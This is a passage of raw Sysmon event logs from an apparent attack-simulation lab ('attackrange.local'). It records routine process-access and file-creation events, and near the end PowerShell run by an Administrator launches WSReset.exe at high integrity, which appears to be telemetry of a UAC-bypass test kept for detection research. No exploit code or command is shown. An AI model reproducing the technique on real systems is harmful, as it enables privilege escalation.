Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F7E2-60EB-E47D-00000000CF01}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.105{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7E2-60EB-E47D-00000000CF01}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:54.091{466BC892-F7E2-60EB-E47D-00000000CF01}4920C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:54.042{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35B5D10D986CB21D1874DABD9817CFDD,SHA256=113CE6C0D8E093CB6E028518D525D54CB3841D432FCAC8261AEF36BC1F49C9B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:55.791{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6180FE22DBAA0461048F95532CD654A,SHA256=2EF94924A4E3D981C2DF69E549BFD5932AA21D62982471B27D2ED12B73B7115E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:55.073{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40F9AF77F6D295C77E1D207514C2DA2E,SHA256=6EDE46429581EE9FB87ECC836FF8B88E4B911C398C2B8A4CC7F5C898A69D3F7D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:55.090{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C58A67829AABA8B4C5D2C6982345900,SHA256=633C3AD2FC6A7536453EF366592152F7148493CAC94FF0A89DB25A499E1C4F82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:56.821{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A084908460CB88A3ED5CB1DF0395D6A,SHA256=E6EA7D2B53A6CD19274F83C5A3B2582879E0C6A8A523AAD41CD4AEA41B71843A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:56.120{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EFA5E2B5C151BDFAF20B93A989649720,SHA256=F464FB2F252D6547D6A81B4D99BE6E5DC2B9A6727D709A510BA07102DB9A4A0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:57.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADF203FC0C64117D8482301AF686ED73,SHA256=795895F007D137399E7926B97019A0BA79F293F935137E5ACA38072EC55FC48B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:57.120{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7094D7D921204D30783FD315858CAA1,SHA256=30E4B97EF917576616FCD782C5076EAA25F600EE6A1E1672F5F68D86EE87EE69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:57.305{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.973{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.973{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.941{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.941{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.941{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.904{466BC892-02B0-60E8-1600-00000000CF01}13047328C:\Windows\System32\svchost.exe{466BC892-F7E6-60EB-E67D-00000000CF01}2492C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.904{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F7E6-60EB-E67D-00000000CF01}2492C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.904{466BC892-F7E6-60EB-E67D-00000000CF01}24929948C:\Windows\system32\conhost.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.889{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F7E6-60EB-E67D-00000000CF01}2492C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.889{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.889{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.889{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.889{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054139Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.889{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.873{466BC892-F7DB-60EB-DC7D-00000000CF01}42528636Shell.Commands.ManagWindowsPowerShell\v1.0\powershell.exe{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\shell32.dll+3cdcf|C:\Windows\System32\shell32.dll+3cc5c|C:\Windows\System32\shell32.dll+3c9ac|C:\Windows\System32\shell32.dll+122467|C:\Windows\System32\shell32.dll+1223c5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+38b30c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2d41f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+af11c7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c0449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64) 154100x80000000000000001054137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.888{466BC892-F7E6-60EB-E57D-00000000CF01}9544C:\Windows\System32\WSReset.exe10.0.14393.4169 (rs1_release.210107-1130)This tool resets the Windows Store without changing account settings or deleting installed appsMicrosoft® Windows® Operating SystemMicrosoft CorporationWSReset.exe"C:\Windows\system32\WSReset.exe" C:\Temp\test\ATTACKRANGE\Administrator{466BC892-F7DA-60EB-282E-0C0500000000}0x50c2e283HighMD5=5181342124A0AB97F865A39581CE9C41,SHA256=FE7AF6AC7EA79AEA47BFF06035875DD1975590F78C31797526908C1A4877EE84,IMPHASH=279E04CF32068F56394D78D663C285A4{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000001054136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:58.857{466BC892-02CE-60E8-7600-00000000CF01}3400NT 